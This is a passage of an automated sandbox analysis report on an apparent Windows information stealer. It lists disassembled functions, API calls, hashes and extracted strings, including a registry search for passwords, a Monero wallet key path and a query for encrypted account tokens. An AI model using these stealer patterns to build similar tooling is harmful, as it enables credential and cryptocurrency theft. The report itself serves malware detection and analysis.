                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: be3c4b87eb589ff50f2c51f150cf2cf0684dc1558ee73d3d82a3609b9082842e
                              • Instruction ID: 760948895650a3cd77de581ebe2cf80b7a52a43007d210e62e629847e011843e
                              • Opcode Fuzzy Hash: be3c4b87eb589ff50f2c51f150cf2cf0684dc1558ee73d3d82a3609b9082842e
                              • Instruction Fuzzy Hash: 5D211AB1E44318ABDB04DFD4DD49FAEBBB8FB44B10F104609F605BB280D7B869018BA5
                              Function 001260A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                                • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                              • InternetOpenA.WININET(00140DF7,00000001,00000000,00000000,00000000), ref: 0012610F
                              • StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 00126147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0012618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001261B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 001261DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0012620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00126249
                              • InternetCloseHandle.WININET(?), ref: 00126253
                              • InternetCloseHandle.WININET(00000000), ref: 00126260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: d00d2eea2f953230f0b6210072e04ba10b9402bc569b87082a27048c31918f8d
                              • Instruction ID: 54a4bff400b9258f99d4ebd6ae03990c1500969d7c2778ceb082ca4851cb94dc
                              • Opcode Fuzzy Hash: d00d2eea2f953230f0b6210072e04ba10b9402bc569b87082a27048c31918f8d
                              • Instruction Fuzzy Hash: 8E514DB1940218ABDB24DFA0DC45BEE77B8EF44701F108098F605B71C1DBB4AA99CF95
                              Function 001272D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0012733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001273B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0012740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00127452
                              • HeapFree.KERNEL32(00000000), ref: 00127459
                              • task.LIBCPMTD ref: 00127555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 86e5670680de7d1666b00c85cb05f812ec4ee443821f3c6d6c9488c71fa96523
                              • Instruction ID: cf17f8339235d4f38bebfec99031351b383ec0a2e0e9769a64a87869de94d34b
                              • Opcode Fuzzy Hash: 86e5670680de7d1666b00c85cb05f812ec4ee443821f3c6d6c9488c71fa96523
                              • Instruction Fuzzy Hash: 76612BB5D042689BDB24DB50DC51FDAB7B8BF58300F0081E9E689A6181DBB05BD9CFA1
                              Function 0012BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0012BC9F
                                • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0012BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0012BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0012BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 2dcc440c61a4bb27a00edd5820193b8bdfbdd964a21bfdbc530bad3a55f20226
                              • Instruction ID: 84e16a3618aed68c7a601c4d5dd5e706be810151f16df6711fab3cfaef9c5dcd
                              • Opcode Fuzzy Hash: 2dcc440c61a4bb27a00edd5820193b8bdfbdd964a21bfdbc530bad3a55f20226
                              • Instruction Fuzzy Hash: C1B13E72910118ABDB04FBA0DD96EEE733CAF64301F804568F546B7191EF746E49CBA2
                              Function 00136770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: ca52858c05704047abe13c91626df3c99c597db6d4f2875e06a77bf29464feb7
                              • Instruction ID: 8090f60c3b387ddaeaa0c0f383d498de0b3a28169c7f486ec9991c1b3adb438f
                              • Opcode Fuzzy Hash: ca52858c05704047abe13c91626df3c99c597db6d4f2875e06a77bf29464feb7
                              • Instruction Fuzzy Hash: 7DF08231904209EFD3459FE0E90972C7BB8FB04703F148198F619A6290D6B04B41DF96
                              Function 00124FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00124FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00124FD1
                              • InternetOpenA.WININET(00140DDF,00000000,00000000,00000000,00000000), ref: 00124FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00125011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00125041
                              • InternetCloseHandle.WININET(?), ref: 001250B9
                              • InternetCloseHandle.WININET(?), ref: 001250C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 91a7a079c68cfe3dd91e357cb98463963519ca87c5444ae67d425447cc5e2c7b
                              • Instruction ID: 6beb9445b57332972b8f38fc8497f2d2239b13647dbfbd061e944feb14260fcf
                              • Opcode Fuzzy Hash: 91a7a079c68cfe3dd91e357cb98463963519ca87c5444ae67d425447cc5e2c7b
                              • Instruction Fuzzy Hash: 5731E7B4A40218ABDB24CF94DC85BDCB7B9EB48704F5081D9F609B7281C7B06A858F99
                              Function 001383DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00138426
                              • wsprintfA.USER32 ref: 00138459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0013847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0013848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00138499
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,00FFE5A8,00000000,000F003F,?,00000400), ref: 001384EC
                              • lstrlen.KERNEL32(?), ref: 00138501
                              • RegQueryValueExA.ADVAPI32(00000000,00FFE590,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00140B34), ref: 00138599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00138608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0013861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: f99c702c614473a6c1741b927dd5ca0295c684f01d373bd75c3e846b2ae4d5fb
                              • Instruction ID: fd70808b32395fc0dee0e5325ef7836e19109563736261d4b2fda8bd59295c19
                              • Opcode Fuzzy Hash: f99c702c614473a6c1741b927dd5ca0295c684f01d373bd75c3e846b2ae4d5fb
                              • Instruction Fuzzy Hash: D821E9B1910218ABDB24DF54DC85FE9B7B8FB48700F00C5D8E649A6140DF71AA85CFE4
                              Function 00137690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001376A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001376AB
                              • RegOpenKeyExA.ADVAPI32(80000002,00FEC240,00000000,00020119,00000000), ref: 001376DD
                              • RegQueryValueExA.ADVAPI32(00000000,00FFE608,00000000,00000000,?,000000FF), ref: 001376FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00137708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 01adaf3919e1b81a3fcd141288ceb3ca68fa61447f3df1f4706e4c9e69250666
                              • Instruction ID: 4ed6941b9f1c03d546c7083603ab92bbede42ccfada393cf6c7deb73b8ca8e3d
                              • Opcode Fuzzy Hash: 01adaf3919e1b81a3fcd141288ceb3ca68fa61447f3df1f4706e4c9e69250666
                              • Instruction Fuzzy Hash: BB014FB5A04608BBEB11DBE5DD49F69B7BCEB48701F108054FA05A7291E7B099008F51
                              Function 00137720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0013773B
                              • RegOpenKeyExA.ADVAPI32(80000002,00FEC240,00000000,00020119,001376B9), ref: 0013775B
                              • RegQueryValueExA.ADVAPI32(001376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0013777A
                              • RegCloseKey.ADVAPI32(001376B9), ref: 00137784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 4ac5cbbedc571748fccc4f2a29d90af88aaafc2939a027195814fffe419386f0
                              • Instruction ID: 2d9730a7a871e695f1c262115edc03eb17d7838db78167c8e40e6e88b19a62ab
                              • Opcode Fuzzy Hash: 4ac5cbbedc571748fccc4f2a29d90af88aaafc2939a027195814fffe419386f0
                              • Instruction Fuzzy Hash: A801F4B5A40308BBD711DBE4DC4AFAEBBBCEB48705F108555FA05B7291D7B065408F51
                              Function 001299C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                              • LocalFree.KERNEL32(0012148F), ref: 00129A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: c7586ac09c937510c739b5a1d37915c7ca830dbf773f2105ab42149659765ac1
                              • Instruction ID: 5c9717a882a74b80e148968242c563151e1ad5b1b6e97abd04f70adac528f5df
                              • Opcode Fuzzy Hash: c7586ac09c937510c739b5a1d37915c7ca830dbf773f2105ab42149659765ac1
                              • Instruction Fuzzy Hash: E0311AB4A00309EFDB14CF98D985BEE77B9FF48340F108158E912A7290D778AA51CFA1
                              Function 00134780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,00FFDEA0), ref: 001347DB
                                • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00134801
                              • lstrcat.KERNEL32(?,?), ref: 00134820
                              • lstrcat.KERNEL32(?,?), ref: 00134834
                              • lstrcat.KERNEL32(?,00FEB9F0), ref: 00134847
                              • lstrcat.KERNEL32(?,?), ref: 0013485B
                              • lstrcat.KERNEL32(?,00FFD980), ref: 0013486F
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 00138D90: GetFileAttributesA.KERNEL32(00000000,?,00121B54,?,?,0014564C,?,?,00140E1F), ref: 00138D9F
                                • Part of subcall function 00134570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00134580
                                • Part of subcall function 00134570: RtlAllocateHeap.NTDLL(00000000), ref: 00134587
                                • Part of subcall function 00134570: wsprintfA.USER32 ref: 001345A6
                                • Part of subcall function 00134570: FindFirstFileA.KERNEL32(?,?), ref: 001345BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
